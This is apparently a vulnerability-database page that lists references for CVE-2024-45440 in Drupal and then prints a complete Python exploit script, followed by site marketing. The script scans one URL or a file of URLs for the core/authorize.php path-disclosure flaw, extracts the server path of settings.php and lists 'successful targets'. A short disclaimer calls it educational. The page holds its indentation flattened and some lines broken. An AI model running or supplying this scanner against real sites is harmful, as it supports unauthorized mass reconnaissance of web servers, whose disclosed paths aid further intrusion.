| Reporter | Title | Published | Views | Family All 24 |
|---|---|---|---|---|
| Exploit for Generation of Error Message Containing Sensitive Information in Drupal | 10 Feb 202616:18 | – | githubexploit | |
| The vulnerability of the /core/authorize.php file in the Drupal CMS system allows a hacker to disclose protected information. | 3 Oct 202400:00 | – | bdu_fstec | |
| CVE-2024-45440 | 29 Aug 202413:42 | – | circl | |
| Drupal 安全漏洞 | 29 Aug 202400:00 | – | cnnvd | |
| CVE-2024-45440 | 29 Aug 202400:00 | – | cve | |
| CVE-2024-45440 | 29 Aug 202400:00 | – | cvelist | |
| Drupal Full Path Disclosure | 29 Aug 202412:31 | – | github | |
| Drupal 11.x-dev - Full Path Disclosure | 15 Jul 202604:32 | – | nuclei | |
| CVE-2024-45440 | 29 Aug 202411:15 | – | nvd | |
| Drupal Information Disclosure Vulnerability (GHSA-mg8j-w93w-xjgc) - Linux - Version Check | 3 Feb 202500:00 | – | openvas |
#!/usr/bin/env python
# Exploit Title: Drupal 11.x-dev - Full Path Disclosure
# Date: 2025-04-16
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: [email protected] # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# MiRROR-H: https://mirror-h.org/search/hacker/49626/
# Version: 11.x-dev
# CVE: CVE-2024-45440
# -*- coding:UTF-8 -*-
import re
import requests
def banners():
cve_id = "CVE-2024-45440"
description = "Drupal 11.x-dev Full Path Disclosure Vulnerability: " \
"core/authorize.php allows Full Path Disclosure (even
when error logging is None) " \
"if the value of hash_salt is file_get_contents of a file
that does not exist."
disclaimer = "This tool is for educational purposes only. Any misuse of
this information is the responsibility of " \
"the person utilizing this tool. The author assumes no
responsibility or liability for any misuse or " \
"damage caused by this program."
width = 100
banner_top_bottom = "=" * width
banner_middle = f"{cve_id:^{width}}\n\n{description:^{width}}"
banner =
f"{banner_top_bottom}\n\n{banner_middle}\n\n{disclaimer}\n\n{banner_top_bottom}"
return banner
def scan_single_url(url=None):
if url is None:
print("[+] Input the IP/Domain Example: 127.0.0.1 or 127.0.0.1:8080")
url = input("[+] IP/Domain: ")
if not url.startswith('https://') and not url.startswith('http://'):
full_url = 'http://' + url + '/core/authorize.php'
print("[*] Scanning...")
try:
headers = {
"Host": url,
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64;
rv:133.0) Gecko/20100101 Firefox/133.0",
"Accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"
}
response = requests.get(full_url, headers,timeout=10)
pattern = r'<em class="placeholder">(/.*?settings\.php)'
matches = re.findall(pattern, response.text)
# print(response.text)
if 'settings.php' in response.text:
print(f"[+] {url} Existed!")
for match in matches:
print("[+] The full path is:", match)
return True
else:
print(f"[-] {url} Not Exist!")
return False
except TimeoutError:
print(f"[-] {url} Timeout!")
except Exception as e:
print(f"[-] {url} Failed!")
return False
def scan_multiple_urls():
print("[+] Input the path of txt Example: ./url.txt or
C:\\the\\path\\to\\url.txt")
url_path = input("[+] Path: ")
url_list = []
result_list = []
try:
with open(url_path, 'r', encoding='utf-8') as f:
lines = f.readlines()
for line in lines:
url_list.append(line.strip())
except FileNotFoundError as e:
print("[-] File Not Found!")
for url in url_list:
result = scan_single_url(url)
if result:
result_list.append(url)
print("[+] Successful Target:")
for result in result_list:
print(f"[+] {result}")
def main():
print(banners())
print("[1] Scan single url\n[2] Scan multiple urls")
choice = input("[+] Choose: ")
if choice == '1':
scan_single_url()
elif choice == '2':
scan_multiple_urls()
else:
print("[-] Invalid option selected!")
pass
if __name__ == '__main__':
main()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation